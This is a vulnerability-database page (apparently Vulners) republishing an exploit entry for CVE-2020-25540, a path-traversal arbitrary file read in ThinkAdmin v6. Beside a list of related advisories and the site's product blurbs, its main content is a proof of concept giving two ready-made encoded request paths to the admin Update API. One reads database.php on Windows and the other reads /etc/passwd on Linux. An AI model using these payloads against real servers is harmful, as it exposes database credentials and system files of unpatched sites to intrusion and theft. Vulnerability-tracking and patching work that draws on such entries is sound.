Vulners
Lucene search
ThinkAdmin 6 - Arbitrarily File Read
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Exploit for Path Traversal in Thinkadmin | 19 Oct 202009:56 | – | githubexploit |
 | CVE-2020-25540 | 23 Apr 202418:12 | – | circl |
 | ThinkAdmin Directory Traversal Vulnerability | 15 Sep 202000:00 | – | cnvd |
 | CVE-2020-25540 | 14 Sep 202012:22 | – | cve |
 | CVE-2020-25540 | 14 Sep 202012:22 | – | cvelist |
 | ThinkAdmin v6 File Disclosure | 20 Sep 202000:00 | – | dsquare |
 | ThinkAdmin directory traversal vulnerability | 24 May 202217:28 | – | github |
 | ThinkAdmin 6 - Local File Inclusion | 3 Jun 202606:04 | – | nuclei |
 | CVE-2020-25540 | 14 Sep 202013:15 | – | nvd |
 | GHSA-2QM5-R82G-5HCX ThinkAdmin directory traversal vulnerability | 24 May 202217:28 | – | osv |
10
# Exploit Title: ThinkAdmin 6 - Arbitrarily File Read
# Google Dork: N/A
# Date: 2020-09-14
# Exploit Author: Hzllaga
# Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/
# Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a
# Version: v6 <= 2020.08.03.01
# Tested on: PHP7.4.7,Apache
# CVE : CVE-2020-25540
PoC:
On Windows read database.php payload:
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34
On Linux read /etc/passwd payload:
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2sData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Sep 2020 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 3.17.5
EPSS0.93767